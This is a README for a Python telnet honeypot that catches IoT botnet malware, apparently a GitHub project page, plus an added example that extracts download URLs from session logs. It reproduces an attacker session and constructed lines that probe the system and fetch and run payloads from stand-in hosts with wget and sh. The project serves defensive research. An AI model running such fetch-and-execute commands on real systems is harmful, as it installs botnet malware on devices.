n0z3r0 / telnet-iot-honeypot

Python telnet honeypot for catching botnet binaries

Telnet IoT honeypot

'Python telnet honeypot for catching botnet binaries'

This project implements a Python telnet server that acts as a honeypot for IoT malware, which spreads via horribly insecure default passwords on telnet servers exposed to the internet.

The script tries to identify download commands like wget http://haxx0r.net/malware.bin, extracts the URLs, and tries to download and identify the malware binaries.

Statistics on the downloaded binaries and the corresponding URLs and telnet connections can be generated from the SQLite database the honeypot writes.

All binaries are also uploaded to virustotal.com, if not already present.

Sample Connection

enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit 
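
The download-command detection described above, applied to lines from this sample session. This is an added example, not the project's own code: the function names, the curl support, the busybox handling and the last session line are assumptions made for illustration.

```python
import shlex
from urllib.parse import urlsplit

# Constructed input: two lines from the sample session plus one constructed line.
SAMPLE_SESSION = """\
nc; wget; /bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit
/bin/busybox wget "http://example.net/bot?arch=mips&v=2" -O .j && sh .j
"""
DOWNLOADERS = {"wget", "curl"}   # assumption: the tools this example looks for
OPERATORS = set("();|&<>")       # shell punctuation that shlex emits as tokens


def split_commands(line):
    """Split one shell line into argv lists, honouring quotes and operators."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split = True  # keep ':' and '+' inside words (Python 3.8+)
    lex.commenters = ""          # '#' may be part of a URL fragment
    commands, argv = [], []
    try:
        for token in lex:
            if token and set(token) <= OPERATORS:   # ';', '||', '&&', '(' ...
                commands.append(argv)
                argv = []
            else:
                argv.append(token)
    except ValueError:           # unbalanced quote: keep what was parsed so far
        pass
    commands.append(argv)
    return [c for c in commands if c]


def extract_download_urls(session):
    """Return (tool, url) pairs for each download command in a session log."""
    found = []
    for line in session.splitlines():
        for argv in split_commands(line):
            if argv[0].endswith("busybox") and len(argv) > 1:
                argv = argv[1:]  # "/bin/busybox wget ..." runs the wget applet
            tool = argv[0].rsplit("/", 1)[-1]
            if tool not in DOWNLOADERS:
                continue
            for arg in argv[1:]:
                try:
                    parts = urlsplit(arg)
                except ValueError:   # malformed host such as "http://[x"
                    continue
                if parts.scheme in ("http", "https", "ftp") and parts.hostname:
                    found.append((tool, arg))
    return found
```

Tokenising with shlex rather than a bare URL regex keeps a quoted URL containing `&` intact and ignores URLs that appear in commands which do not download anything.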

Languages

HTML 46.0%, Python 38.2%, PHP 15.8%